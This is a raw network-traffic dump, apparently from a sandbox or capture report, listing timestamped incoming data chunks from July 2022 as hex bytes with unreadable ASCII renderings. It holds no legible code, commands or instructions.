                                                                                                                                                            2022-07-07 07:51:12 UTC2434INData Raw: b3 5d 19 bb 1a 49 ac 99 55 da 3b 00 af 95 56 f0 ae 7b c4 ae bb 5b 3f 03 18 00 16 71 b3 42 32 9d 8f 62 9c 78 6d c1 fc 66 70 50 29 68 36 0d 4e 15 fd c1 92 17 39 ef 70 ac 31 78 e6 e6 83 ab 81 9f 6c de b2 4c eb 66 69 aa 24 7d 15 74 d0 52 f7 37 db 8b ea 6e 14 96 d4 9d 5e f8 cf ba d3 fd ef 5c 7a 26 0f 1e 9b a8 31 50 14 83 a8 96 82 53 55 96 d4 7b 37 49 80 ad 46 63 cb 10 3f 9d cd 98 14 b6 b3 cc 77 1d 32 63 01 b8 40 46 d8 b1 5a 66 d1 2b ac 1b 9f 0a 60 f8 03 95 53 a2 fe 1c 6e 9f f9 b8 80 a6 6d 33 b8 01 f2 9b 3c 27 24 14 4a 2d 6e 4c 10 b4 99 e7 c4 fb dc ce 19 d4 09 02 e8 4e 9e 0f 8e fa b0 60 38 05 40 91 73 a4 11 7c 41 fd ff 0e ec 5c a3 01 7b da aa 27 61 6c a9 b1 6e 9d 50 cb 83 d5 be 5b 99 44 f6 42 7d f6 84 cf 1b 97 b4 47 fb 0e 93 11 94 58 de 8d f1 f9 59 33 36 bb 85
                                                                                                                                                            Data Ascii: ]IU;V{[?qB2bxmfpP)h6N9p1xlLfi$}tR7n^\z&1PSU{7IFc?w2c@FZf+`Snm3<'$J-nLN`8@s|A\{'alnP[DB}GXY36
                                                                                                                                                            2022-07-07 07:51:12 UTC2450INData Raw: 37 ea 54 d3 a9 17 8d b7 c4 12 d4 4d 0f 48 13 2a 60 4a d2 93 6f c8 71 da 9a 6e c5 45 00 b2 6b b9 32 23 55 1e 71 9f c6 7d 5c 7b 7b 77 60 3d 30 82 6f 7e 8d 8b 57 95 da d7 81 e6 c6 62 53 e2 73 eb 30 60 80 1c 7f e7 d5 fb 95 22 84 2b fd 0d f6 b7 a4 d5 43 90 b8 40 6e e9 77 c2 98 0c ba 52 0b b6 60 b2 03 a3 8c 31 21 da d9 34 56 1b cf f6 fc d5 03 b0 78 da 5f 36 6e d8 98 85 d5 59 29 57 e8 70 9a 91 ca ec 53 ee e9 a1 b5 44 a5 5d 61 b6 8a a0 af 5a a2 94 13 a9 67 eb 4e 09 15 40 e2 50 b2 d6 7e 35 22 63 2d 59 15 76 dc ce de 3e 89 95 1a af 2f 9a 42 e8 35 78 95 80 fe 28 dd 41 83 5b e2 7b 7f 85 1f 7e 2a 38 71 01 65 6e d5 ef 7f 8c 39 fd 61 4c e5 42 13 2d 6b 17 60 09 37 ff 1d 3e 0b c1 4c 0b 1f b5 d1 39 51 c2 a6 24 db 8c b4 04 15 a0 c2 8e 7e 27 55 2a 0c 12 48 83 30 4c 5d 51 ac
                                                                                                                                                            Data Ascii: 7TMH*`JoqnEk2#Uq}\{{w`=0o~WbSs0`"+C@nwR`1!4Vx_6nY)WpSD]aZgN@P~5"c-Yv>/B5x(A[{~*8qen9aLB-k`7>L9Q$~'U*H0L]Q
                                                                                                                                                            2022-07-07 07:51:12 UTC2466INData Raw: a3 c7 cc 35 a1 7a f0 bc d6 50 f9 5c bb f5 7c a5 f9 9c 74 22 74 16 3f 49 c4 bb 8a 82 2d cf a8 59 b2 ad 2a a9 a0 68 ab 90 c7 a8 17 8d ac f9 d1 0f e5 2f 12 9e 34 e0 e9 7f 71 be 21 0b c6 48 30 9c e5 55 99 90 87 3b 4b 9c 9b 2b c3 b1 3d db a0 f1 1e fa d6 43 e7 ad 1c ce 3b 2d 09 3a 93 58 15 c5 7c f6 04 94 03 5a 34 ea 53 8d aa 9f 6b df ae 6c 8b 6e fb b1 cc 2b 40 34 90 7e 88 80 db b1 31 a8 98 6b 88 b8 f2 47 6d fe a4 d4 39 e7 a3 69 d2 49 6b 56 4d ca 23 50 6d 7e 1d 49 0f e6 b4 0c 5d d0 97 06 2a 1c 6b cb 5f f5 78 8b 4f f5 29 90 c6 fe 8c 71 14 5d 23 57 02 4e fd c7 a1 97 46 6a 48 2c e1 1f 07 84 b4 02 21 14 29 e1 9f 62 86 5f 84 95 c9 0e c0 e5 7a 85 45 8f 2d 03 df 48 ef f4 f1 55 22 8b 10 0e 79 2a 23 23 12 ab d6 23 4a 41 64 ab ff 7c e5 5f 52 2a 47 e6 9c 1f 45 45 0c ec 36
                                                                                                                                                            Data Ascii: 5zP\|t"t?I-Y*h/4q!H0U;K+=C;-:X|Z4Skln+@4~1kGm9iIkVM#Pm~I]*k_xO)q]#WNFjH,!)b_zE-HU"y*###JAd|_R*GEE6
                                                                                                                                                            2022-07-07 07:51:12 UTC2482INData Raw: b8 23 5c 9d d5 35 d1 3d 20 c0 43 29 0a 71 42 b3 91 67 41 a1 81 b5 b7 e6 22 52 f2 9d c0 17 fd 39 88 2e 79 37 02 be 5d d8 9c da 22 73 ab 5b 9b 0f c8 ac 14 ea 58 d6 c0 b8 bb 0c 80 93 15 af bb 7b b3 56 c3 7d b9 a7 13 e5 ca 04 aa f6 ea 76 54 5f 4e 36 eb 76 c4 b1 82 e6 69 99 21 a3 37 71 5c 11 16 b5 cd 39 dc 64 c4 a5 d8 4d c2 20 f1 b8 a7 46 33 e1 0a a1 59 1f f0 c9 7d 28 91 2e c4 d8 58 a9 f4 15 00 6a 46 31 45 04 3e a7 d7 19 7b 2a 03 b9 79 49 aa 61 60 b2 fd 7d 88 80 27 02 1e 4e 30 7e 92 87 7f d6 20 1c f5 5e 74 fb 29 3c 5d 6a 64 11 5b 10 71 66 f0 e2 91 5d 09 0f a6 45 60 b2 79 90 c9 23 b8 ca e0 ea ad fc 7f 6a cd ce cd 2b 18 39 06 a2 55 a2 2d fe f1 eb 39 4f cc 41 76 a9 7d de ea c3 47 bf 37 a3 77 e5 30 20 c0 b2 e4 8e 78 17 fd 2d 2b 69 44 d3 7c a6 ab 6e 70 50 9c 5f a7
                                                                                                                                                            Data Ascii: #\5= C)qBgA"R9.y7]"s[X{V}vT_N6vi!7q\9dM F3Y}(.XjF1E>{*yIa`}'N0~ ^t)<]jd[qf]E`y#j+9U-9OAv}G7w0 x-+iD|npP_
                                                                                                                                                            2022-07-07 07:51:12 UTC2498INData Raw: 3f 5c e4 30 53 72 fa 97 e7 5f 55 41 f1 b6 56 e0 5e cf 9d 4c 4b 74 54 33 c5 f5 91 25 32 01 d1 05 15 da 44 22 d2 a5 cd c1 5e 31 b5 71 dd e0 15 c8 52 5a 13 e4 a0 27 a9 16 7d df 60 c0 6a 97 be 62 47 0e 2f a4 2a f8 8e 00 09 fc ab fe b7 62 50 10 f9 68 79 6a 6d a9 01 02 0d e8 0b e1 74 f4 0e 02 fa 31 01 03 6b 4c d7 c2 24 3f 31 df aa c5 d2 e9 95 68 7c e5 54 1a 18 78 22 c6 78 cc ad 91 54 62 df d8 ff 2a 84 72 53 bc 05 93 83 a5 0c 52 8f 08 50 68 bb 74 d8 c2 5a 63 c8 87 06 70 ae 8f 23 79 d8 7a 7d 6f d8 d9 bf a8 1f 52 96 e7 fd fd 1e 95 25 77 9d 66 74 d0 d1 c6 75 64 c2 cf 9f 29 78 43 23 2a 6f 1c c9 b3 42 e5 17 5f 3c 71 a1 45 b6 25 34 5d 43 2f 62 ab 98 3d 42 95 36 74 0a 62 24 04 ab 10 bc 07 25 ec f8 00 44 ff fa 0e 08 e1 f7 2b 1c c6 82 7e a0 b1 0f 48 2c 4b f3 d4 61 c1 cc
                                                                                                                                                            Data Ascii: ?\0Sr_UAV^LKtT3%2D"^1qRZ'}`jbG/*bPhyjmt1kL$?1h|Tx"xTb*rSRPhtZcp#yz}oR%wftud)xC#*oB_<qE%4]C/b=B6tb$%D+~H,Ka
                                                                                                                                                            2022-07-07 07:51:12 UTC2514INData Raw: 99 68 6a 07 ea ff db 33 57 a6 9a 8d 27 a7 6b d0 2e 65 c4 71 45 13 41 45 1a 93 6a d7 85 16 6b 6d 3c 65 71 53 ba 19 b8 a8 a1 d3 f0 81 4a ed 50 bb f7 80 79 30 19 79 82 9a 61 cb d1 4f d2 e9 34 8b f2 a6 b9 8f bd 1a e0 4e dc cb 05 15 20 50 cb 20 73 36 31 40 da fe 5c 36 8b e6 b0 22 52 08 b0 1c 80 ef 30 e7 1c 23 d9 5f 3a 90 9f 87 f0 e2 32 83 cf 11 a6 7a 14 eb d6 fd 99 5a ad 8c d4 aa 14 5d 40 f8 72 f0 1a c7 15 31 5e 80 84 5c af ac 95 7b df 05 52 42 89 d9 f1 80 67 3e e1 0b dc e3 c0 ec 59 1c 81 49 40 7a bb 99 a5 0e 0f 83 a5 f7 0f cd 38 a4 56 68 21 1b b3 70 c1 76 00 0b ee 6d b3 54 fb 4e ba c9 f5 56 35 71 2b b4 ef 8b fc 50 d6 1a 4b 56 ec e7 ba 89 3c 1b 6b 14 c1 1d 27 d3 cb b9 ab 2f e0 a8 47 e2 b5 63 07 45 12 c6 4d d7 1f 4e 6e 79 28 cc 6b 9c 3d fe 02 60 28 50 58 aa bd
                                                                                                                                                            Data Ascii: hj3W'k.eqEAEjkm<eqSJPy0yaO4N P s61@\6"R0#_:2zZ]@r1^\{RBg>YI@z8Vh!pvmTNV5q+PKV<k'/GcEMNny(k=`(PX
                                                                                                                                                            2022-07-07 07:51:12 UTC2530INData Raw: 04 26 e5 61 f4 b2 92 5e 3a 33 33 ea ff 2f 36 cb 60 16 e0 0b 99 1c ee 4b 14 0a 4a 78 7b 34 11 d5 e3 fe c1 df df ef e6 4b a9 79 ad c2 8f ea 68 7f fa 05 f8 c6 d5 68 d0 61 4e 47 e1 2e 02 d3 37 7f cd 99 ec e8 d9 1a 34 72 e0 56 93 c5 02 3b 32 73 93 ff 24 a2 bd 9a 49 63 c8 48 43 03 44 43 60 f4 ec 96 82 44 0a ed 64 e7 92 1b 29 29 e5 c9 1d 27 80 42 d4 db 1b 34 d7 28 7a 67 81 9f f1 c2 b6 9a e3 df 06 b2 80 1e 17 56 b8 19 b0 f5 21 c3 c8 3e 0d 62 2b b0 f0 7f 9a 3d e6 83 1e 94 81 97 5d 07 44 52 e0 d3 f8 ad f3 14 05 59 9d 32 03 00 3d 5f d8 93 55 7a 18 4e 10 75 a0 bc d5 4c ef fe 04 f0 3c b3 11 27 a7 00 b5 a8 0f 5d 18 87 c8 f1 c9 e0 d7 5a 3c 42 23 d8 8d fe d8 ba 7b 81 e2 06 4a 08 0b 9d 50 a8 52 9d fc c7 47 f3 5c 5c eb ef 34 cc 8a 82 ae ac d3 86 8d 85 ef b2 15 0a 42 1d 40
                                                                                                                                                            Data Ascii: &a^:33/6`KJx{4KyhhaNG.74rV;2s$IcHCDC`Dd))'B4(zgV!>b+=]DRY2=_UzNuL<']Z<B#{JPRG\\4B@
                                                                                                                                                            2022-07-07 07:51:12 UTC2546INData Raw: 81 55 de e6 a3 c7 90 dc 96 1a 16 a4 27 89 2d af 15 5a a6 1c 5e a1 49 2e 01 10 07 5f 69 2f c9 16 19 63 8d 6b b6 21 4c f9 4d b7 88 65 76 e1 15 8c 69 5e 54 6b 0b bd 95 e5 2b 19 0d e3 29 a0 89 3b 34 d0 07 67 fc 9c cd 0e 1f aa dd 51 d8 19 1b f4 5d 5f d8 e1 63 82 d3 04 6b f3 92 45 8d f9 f2 1a 05 51 f9 1f 6b 3f 9a 79 c6 1e 80 65 99 0d 78 ab 03 7d cd 7e 19 53 10 7f 77 d6 b7 de 67 30 c9 76 f9 5a ac 3c 6b ee 6a 8f 5b 80 34 c7 8a 85 49 a4 f6 52 e4 be 74 16 a9 9f cf 28 8b 84 bd f9 cf 71 c1 fa 6a c7 d8 e2 5b 40 17 af 12 f2 c0 90 29 a3 dd 00 1d f3 f0 83 94 7d 90 7a cb 8b 81 27 43 10 81 94 21 88 7d ac ec ee 43 e8 77 52 ad 8b 9f 72 1c 4a a7 d0 98 00 90 61 58 27 68 dc ad ba 9f 7b cc ea f8 a4 df fc 2c 8b 82 2f 05 f7 58 a4 2a 91 b4 b5 92 45 01 35 ae f0 26 c9 33 47 8e 00 ab
                                                                                                                                                            Data Ascii: U'-Z^I._i/ck!LMevi^Tk+);4gQ]_ckEQk?yex}~Swg0vZ<kj[4IRt(qj[@)}z'C!}CwRrJaX'h{,/X*E5&3G
                                                                                                                                                            2022-07-07 07:51:12 UTC2562INData Raw: cc 97 41 98 5c a6 02 a3 9c 5d ae e3 26 fb 5c 6d d7 b8 56 27 72 ae 91 21 ea e3 3b b5 b2 fe 46 40 eb 47 24 d1 60 6b a8 d2 f8 2d 86 2a f0 49 c8 f4 e4 a5 ba 8d 91 f1 9b 0e 98 c7 dd 0c fe 98 56 22 9a 5e 23 c5 d3 4e 70 e6 b5 43 c1 70 93 53 d7 ca ea ff 1f 70 4c a4 05 8f 1b af f1 9e ac ff 1a 51 f6 45 2f 5c d4 d6 cb 28 f8 b2 8e 67 9c f0 96 c5 6c bf 4c a0 2c 9f 19 22 d5 55 91 3e dc 94 46 35 ea f0 73 4a ff 82 e9 a2 8f 38 f1 a4 d5 3b 58 b8 24 65 b6 58 bd a7 db ff 6e 80 ef 1e 7f d1 a5 7c bd 7a 69 83 30 50 12 c8 3d 94 47 67 b1 df 38 93 f1 2d 29 31 3b 1a 02 61 5c 4c d0 2c 0b ac da b7 95 fe 0b 7a 7f 20 e1 ef 7e bf 7c 88 36 2e 43 86 7c 8d 08 33 65 e2 e4 21 2e 67 94 95 5b 44 d6 0a 57 b4 85 99 5a 56 62 aa 11 66 20 1e 32 74 4c c1 25 db 37 22 7d 0b e0 17 7f a6 ea 19 96 f3 f7
                                                                                                                                                            Data Ascii: A\]&\mV'r!;F@G$`k-*IV"^#NpCpSpLQE/\(glL,"U>F5sJ8;X$eXn|zi0P=Gg8-)1;a\L,z ~|6.C|3e!.g[DWZVbf 2tL%7"}
                                                                                                                                                            2022-07-07 07:51:12 UTC2578INData Raw: fa 8c 94 3a 3a de 4d d3 da 7d ab 0a 30 40 85 d3 65 fb bc c4 cd 7e 9e 21 56 22 cb 3f ac f0 9a 77 4b de ec 3b 33 90 17 36 66 a5 54 28 b1 25 e4 94 9e 01 a8 c8 2e 04 18 7f 8d 60 0c ce db 15 fc c8 fe 3d 12 24 59 50 80 e5 59 c1 bc 40 4c 6f 6c e9 45 af d2 e3 2a 1f d4 df b5 58 90 c2 b2 d3 62 e0 24 6c f1 bc c6 a3 17 c7 90 74 7c 5a 32 20 81 c2 ea fc 01 67 36 1c b4 12 5e 62 6d 4b 3c 7c d6 82 31 a0 f8 6d fb 44 0c 8a b1 81 0c 1e 1f 09 f7 20 d3 22 d8 f0 16 0d 1b 12 e6 02 96 ff 41 58 a3 20 b8 e0 cf 35 5f 52 71 bf 90 6a 80 70 c6 79 f4 0d b7 d6 16 72 15 1f e2 1f e0 b3 43 68 cd 64 23 29 f7 6a 77 9c 95 38 6a 6e 05 82 0d 5f f4 32 4f 2f 88 1e 51 bb bb 84 46 6b cf 61 f9 e5 8c 97 fb c4 48 6f 19 d4 b1 d7 52 b6 4c e4 af ad c4 98 ad 63 80 c6 62 20 fe c8 6e 3b bf 26 ab 97 2c c3 91
                                                                                                                                                            Data Ascii: ::M}0@e~!V"?wK;36fT(%.`=$YPY@LolE*Xb$lt|Z2 g6^bmK<|1mD "AX 5_RqjpyrChd#)jw8jn_2O/QFkaHoRLcb n;&,
                                                                                                                                                            2022-07-07 07:51:12 UTC2594INData Raw: 9a 7e fb c6 62 00 46 6b 65 89 1b 9e 87 26 d0 0e c2 9c 5c 48 ad 20 d1 bb ff f7 79 26 46 f2 b9 e0 d5 e7 09 3d 6a 14 52 21 7e 22 5d ae 22 0d 2c 4c 83 0d 2d 2e dc 34 e2 21 7a 9c 0a f4 0f 62 df 14 e6 b5 76 a6 96 b6 a0 74 2c 11 e3 11 12 e4 f0 a4 12 96 b5 07 8e ee 8d e0 34 87 3d 8a 2c c7 1e 99 3a 6b 3b 6d 16 7f be bc 9f 1b 06 05 67 37 38 ef a0 0f 20 42 69 48 09 9d ca 24 26 06 cc 04 94 ba 98 46 77 66 b8 5c 9e 8a da f9 2a da 5e c6 9b cc e5 ae cc 8d 69 5a 0a a1 50 92 d3 d6 a2 9b d9 e8 4f ae 45 b3 05 34 be 57 93 09 f5 63 3e 92 a2 11 45 57 90 cb 29 0f c1 94 00 8c bb 49 c3 20 34 37 70 08 e1 7d b7 8a 65 d0 70 1f e1 27 b0 f0 c2 cc 72 8a 0a 57 dd e0 79 c9 84 b9 9b 9e f3 52 27 74 f9 35 e1 a2 9a 18 ac 42 ca cb bc 1d 19 23 28 3e 8c 2f a3 6f dd 8a 1f 72 01 90 b0 4a 8d 94 af
                                                                                                                                                            Data Ascii: ~bFke&\H y&F=jR!~"]",L-.4!zbvt,4=,:k;mg78 BiH$&Fwf\*^iZPOE4Wc>EW)I 47p}ep'rWyR't5B#(>/orJ
                                                                                                                                                            2022-07-07 07:51:12 UTC2610INData Raw: 80 0b b2 27 ab 65 d1 91 47 e7 50 8c 79 16 a3 9f 8d 9c 9c f7 d7 05 bb c7 d8 fc 80 09 94 2b 8c 9a a9 21 a8 40 22 ec 02 3f e0 15 0d d3 bb ae 37 d1 95 d8 9b 7e 59 1c c1 37 58 ab 30 9d 65 fa 34 85 4c 5d cc 07 eb 7f 9a 06 a1 4c 9b d9 bf 23 5d 16 59 79 1d 97 83 d5 3e c5 46 0c 75 8a 19 ba 02 5d 25 90 52 b0 53 6c a6 1d 0d 60 9d 22 86 2e e5 0a f1 7a c1 46 cf c0 17 21 1e 09 f4 b7 32 6c 6c ab dd e7 29 20 e0 bb 94 25 c3 20 5b 98 bf 96 c6 a3 bd 1f 63 09 c1 41 15 66 1c af 0b 2e 5a cf 95 17 56 7b 61 55 f6 8f fa 5a 25 4b 79 b2 bf 71 49 de ac 60 a7 3a 14 d0 3f a0 ce 11 2e da 70 bd 6c c7 38 fb 8d 31 60 eb 41 fe 9b 86 a8 52 1e 0b ed 57 d7 bb 60 d8 4d 2d a0 16 b1 6f b6 aa 9e 30 4d f2 45 fd eb 76 37 09 32 4c 3f b4 c3 b0 11 a1 6c 25 2c 3a d0 60 ec 89 3c d6 31 11 62 83 b3 a9 07
                                                                                                                                                            Data Ascii: 'eGPy+!@"?7~Y7X0e4L]L#]Yy>Fu]%RSl`".zF!2ll) % [cAf.ZV{aUZ%KyqI`:?.pl81`ARW`M-o0MEv72L?l%,:`<1b
                                                                                                                                                            2022-07-07 07:51:12 UTC2626INData Raw: 6e 24 2a bc 89 40 3d c1 5b 88 50 6a 66 57 d0 0e b4 96 b8 b0 83 9f fb 5f d0 67 be 9d f7 b1 64 ac fc 72 33 25 96 90 c1 31 59 9a 2a cc e2 96 79 7b 8b 76 3d 30 9c de dd c6 2a 33 04 71 f0 36 22 3b 94 1c 51 47 5e d2 70 2b b9 e2 97 33 ee 84 ca ef 8a e7 2c b8 19 58 62 d9 dd 2f 2d f8 58 06 de f1 11 23 4a d5 a5 20 b2 f9 cf c3 11 5f 11 bb 6c 49 70 4e 9f c6 2b a7 85 02 2d 49 10 ab 58 ec bd 7b ea 77 71 78 3c 08 d1 6f 46 e9 4e 56 79 9f ed 1b 91 27 11 be 1f 42 1a f2 e9 35 32 37 4e fd 5e f4 e2 ec 88 3b d4 1b ba 91 8f 3b f8 93 ab 49 3c 6c c7 ae d9 ac 75 8d 5d a0 12 b6 c2 41 da 47 92 9f c8 6f 65 e1 2c 98 bc 6f da 0d f1 e3 5e f4 1d 8f 58 34 ca ef 51 58 55 dd d8 46 75 67 03 45 dc d3 cf 3e d5 98 bb 7b 78 2e e5 43 4c 24 5c 88 c1 50 59 cd 96 b4 d1 11 ce 23 f9 38 6e d2 b3 c3 d8
                                                                                                                                                            Data Ascii: n$*@=[PjfW_gdr3%1Y*y{v=0*3q6";QG^p+3,Xb/-X#J _lIpN+-IX{wqx<oFNVy'B527N^;;I<lu]AGoe,o^X4QXUFugE>{x.CL$\PY#8n
                                                                                                                                                            2022-07-07 07:51:12 UTC2642INData Raw: ab 16 17 11 68 f7 f0 f3 cd 84 44 21 d3 a6 22 a2 84 7b bf cd fb b3 ad a4 bb a4 76 9d c4 89 da d8 79 44 66 7d 8b a3 91 3c b5 4b 0f 7f d4 65 b5 ce 6b da fc 47 38 47 a8 63 1e 54 44 2e e9 1c 73 fd 04 bd df 47 7c 54 9e 39 67 23 7b e6 29 89 b7 75 83 5a 69 44 e8 40 ec 52 9a b3 68 09 90 f4 b8 6c a5 66 45 95 67 9d ce b5 e9 15 4f a2 18 07 61 d1 ff 09 65 d4 a6 48 20 41 7e c2 71 b1 f2 24 17 f7 53 60 ca c2 8e 0c 63 32 88 d4 5d ea a9 d0 2d a3 c3 d1 c9 1b e7 e7 4e 01 6e cc e4 60 86 11 15 c5 c6 3a 0c 66 ac a7 1a 6c 94 7b 3b 9e 96 9c 55 8d 51 39 c3 8c d3 23 2b f8 ee 7f c3 27 1c f9 7c d4 17 33 ad 40 bf 8d b3 7e 25 77 ec 31 48 30 c5 17 ed b7 a3 82 4e 05 cc e5 75 9b 52 f8 bd ad 1b 60 e1 96 55 bb 55 6b 00 bc 90 49 af 3d f6 10 27 14 0e 07 9b ee 8d c0 94 76 79 f7 56 2a ee e7 5a
                                                                                                                                                            Data Ascii: hD!"{vyDf}<KekG8GcTD.sG|T9g#{)uZiD@RhlfEgOaeH A~q$S`c2]-Nn`:fl{;UQ9#+'|3@~%w1H0NuR`UUkI='vyV*Z
                                                                                                                                                            2022-07-07 07:51:12 UTC2658INData Raw: b2 81 ac 4b 8c 58 4f 7e 4d 94 73 22 f0 aa c9 35 c1 6e 29 f7 95 38 15 23 39 5a 2a b8 8c a5 7a be 4c ed e9 89 8d c3 7e 23 58 b3 50 a5 6a 09 18 19 0d 99 29 6f 77 ef 01 51 66 5e c2 e9 c7 6d 36 a0 d2 8e e5 9c 34 04 b3 f2 f8 e9 83 44 02 4a e1 48 0e 9f 1a 5f 8e f4 77 f8 21 f5 da 9c 4c a7 74 6b 60 cc 7f f9 7d d4 e1 91 8a 9b 7c 33 7e 78 0a 39 85 19 97 85 4c 91 72 9b 4a 4e 70 be 61 86 a6 ff 65 90 f4 69 8f d9 f0 80 cd d2 c3 79 ab 3c 9d 11 23 d5 01 0a b6 c0 77 7c ff e8 51 1a 5c 0e f9 c1 21 7b a5 8a 85 48 ea d2 c2 a1 88 80 d5 2c b8 5e 4d df 35 e9 b3 f7 d0 bc df 04 83 4d 29 f5 b9 e8 3e e6 74 4d cf 33 26 8b 7e 76 f2 3b 01 f4 e6 34 77 1b 42 39 bf d9 85 a0 ef 5c 6c b7 75 b5 a1 1a c3 6b 94 df 2b 62 bd ab e0 ad 24 99 3a 0a 15 92 93 0d 1e eb 10 ec f8 47 62 67 a0 b3 f7 35 29
                                                                                                                                                            Data Ascii: KXO~Ms"5n)8#9Z*zL~#XPj)owQf^m64DJH_w!Ltk`}|3~x9LrJNpaeiy<#w|Q\!{H,^M5M)>tM3&~v;4wB9\luk+b$:Gbg5)
                                                                                                                                                            2022-07-07 07:51:12 UTC2674INData Raw: 03 d4 c4 b1 1e 9e 50 74 ba 6e f6 da 73 fc b6 74 31 c9 72 5f bc 63 3c e2 1a 93 fd b1 3e e9 58 51 b2 2f d1 6d 93 89 ec 81 1a 52 6c e3 61 78 1b ba d5 d5 07 b1 ab 7c 69 36 43 00 5c c9 e3 b7 f9 a2 62 bf 55 95 88 ac d0 6f b2 a2 ff c9 9d c3 5e 6a 78 64 19 e8 1c b2 81 34 ad 5a 7d b1 10 b9 e3 06 ca ac b8 4c 27 c6 76 43 a5 f5 b9 71 2f cd ed 66 7b 5b 35 2a 41 86 6d 4f 44 12 54 b7 94 78 ad d4 70 b8 05 0e 76 e4 00 e4 d6 e0 8e 9c f7 a1 30 99 45 0b d5 f7 d8 66 7a 2d c9 87 c1 4e 2d f8 1a 1d 1a 9c 23 91 b0 56 6c bf 3c 95 ea e1 6d f5 07 de c3 43 cd af be b4 4d 57 30 81 12 de da 3c ac 96 3e c9 52 37 d8 83 03 68 95 54 aa 75 60 66 69 63 93 0e b9 81 c4 b5 fc 58 92 6c d7 ff 3c e8 f2 e2 ee cc eb 7e ae dd d1 d1 a6 03 f5 7d 64 e4 2a 0e e3 e5 ed aa 6b 47 f4 95 3e 2d 40 87 f9 d0 65
                                                                                                                                                            Data Ascii: Ptnst1r_c<>XQ/mRlax|i6C\bUo^jxd4Z}L'vCq/f{[5*AmODTxpv0Efz-N-#Vl<mCMW0<>R7hTu`ficXl<~}d*kG>-@e
                                                                                                                                                            2022-07-07 07:51:12 UTC2690INData Raw: f0 0f e7 7f bc 50 fd 24 78 62 e9 12 53 ce 59 78 15 0e 39 d6 9d 9d 2b 9a 79 21 95 b2 40 1f 66 e9 cd 6f a9 45 d4 40 57 43 7a 16 09 f5 4f f4 0f 90 19 54 e2 ea d0 73 43 35 76 bd a9 b1 a2 c8 b8 c3 27 b4 c0 0e cb a2 96 8d 21 80 f4 6b c2 1f fc 6f 3f 2c ac e6 4b 76 44 c7 b7 ac 66 e0 c9 30 76 86 83 eb a6 e1 b0 08 c4 3c 0b 99 a5 b9 59 3f 72 99 bb e3 7e f4 01 6f 82 31 82 27 b2 c6 58 4f 25 d1 4b 15 cc 92 eb da 67 06 0f f4 83 b4 af fe 3c f2 94 85 dc 15 18 e8 b4 69 7f 79 37 f4 f6 ae 71 06 98 66 21 ed 9f 67 38 7b b5 d7 24 8a d2 50 80 b1 ec 87 73 ae 3d 3e 98 ab 2f ea a8 05 46 48 df 92 6f 25 43 7d ee bc 8c a1 71 18 15 c4 71 71 e7 8c 71 41 3f 0d 87 b4 a0 da f7 a8 7e 50 73 91 91 2b 2a 15 9e 02 66 c5 5e e3 cf 39 7a 1a 1d 23 ea e6 68 79 77 07 8d d1 26 bc 64 d2 bb a2 d9 93 ea
                                                                                                                                                            Data Ascii: P$xbSYx9+y!@foE@WCzOTsC5v'!ko?,KvDf0v<Y?r~o1'XO%Kg<iy7qf!g8{$Ps=>/FHo%C}qqqqA?~Ps+*f^9z#hyw&d
                                                                                                                                                            2022-07-07 07:51:12 UTC2706INData Raw: 0b 10 4d 10 8b 54 98 53 58 f1 59 8a 5e df 39 89 08 96 32 57 18 73 a3 53 f9 71 d7 70 e3 9e d8 3b dd b2 ff de 98 f4 dc b6 5c b2 fd 31 97 2e 37 33 aa f5 2b b0 50 18 e6 64 52 53 50 4c e6 0f 18 e3 3c d5 70 1d f9 4d 56 7f 2b 4e 90 15 a2 29 c9 d2 39 f3 b8 68 4a a4 79 36 72 51 59 c3 07 ab 9e 3e 5b 34 a5 7e 92 d6 dc ce 53 df e2 3f 1c bd a2 5d 62 64 c1 ec c9 a6 4d 9f 72 c7 dd de 44 09 1e 6c 7c 78 bd 0f 67 c9 ce 3c a3 b4 5e 36 c0 15 7d c7 34 a7 c1 f5 67 03 9a a7 20 f6 5d 28 25 2f dc d4 b9 57 cb 51 ed ad db a9 39 44 35 1e 75 75 87 65 c2 ee 5d 9b 41 b4 3a 97 65 d0 7e cb f9 42 c3 f6 e5 ba 88 55 5a 0f 72 cd e0 45 6f 2a 51 ae 3f f5 34 48 fa 90 44 e5 1c 7d b9 20 71 94 cb a0 25 ed ca 23 98 e2 34 91 c1 9f f7 4d 61 46 a1 7b e5 57 f9 9d 11 cf 6a 2b 69 6d 1c 3b b4 7f 2b e0 bb
                                                                                                                                                            Data Ascii: MTSXY^92WsSqp;\1.73+PdRSPL<pMV+N)9hJy6rQY>[4~S?]bdMrDl|xg<^6}4g ](%/WQ9D5uue]A:e~BUZrEo*Q?4HD} q%#4MaF{Wj+im;+
                                                                                                                                                            2022-07-07 07:51:12 UTC2710INData Raw: 4a 3a b5 13 8d 25 38 bd ed c3 fa 15 5f 26 48 b3 31 9f 37 ca ab 02 ee 4f d4 ea 66 59 98 cc 4e ed e7 e0 0c b8 ab 44 97 c4 0a 0c d7 a0 f2 cb d8 b7 68 0b 34 d1 ee 25 c2 a1 fd f6 2b 1d 57 8e fb 55 ed 05 a9 54 52 20 66 db 83 23 1a 9f b1 ea 2a d0 01 a6 69 2f f2 19 0b 10 74 94 d9 19 16 25 4a 2f b2 4c 0c 02 f4 89 6f 28 7b 36 22 cb 49 07 03 ec a9 0c 09 fa 1a ec ad 54 31 88 eb c7 7d cc 96 2e 8f fd 96 a6 cf b1 1a c3 ac 9d 21 1d a8 2c 4b 02 93 7c 58 03 04 90 3c 4c 2c e7 dd 1f 6c a1 9f 39 fd 12 56 cc 0c 1e 53 9b a1 8a 5b 29 27 66 11 4f c8 52 bb 7e 4e c7 bb 04 de 3d e4 5f 99 6b aa 16 68 5b 89 ff 68 fb 06 33 20 9a af 59 f5 61 5f f9 e4 3c 80 a2 71 2f 1b bc 08 57 dd 07 a0 c9 0b 2b 25 75 7e 7d de e8 1b 5e fe 87 c1 77 17 fc c6 35 b4 04 82 39 97 cc 7e 44 a2 75 37 f0 d4 68 0e
                                                                                                                                                            Data Ascii: J:%8_&H17OfYNDh4%+WUTR f#*i/t%J/Lo({6"IT1}.!,K|X<L,l9VS[)'fOR~N=_kh[h3 Ya_<q/W+%u~}^w59~Du7h
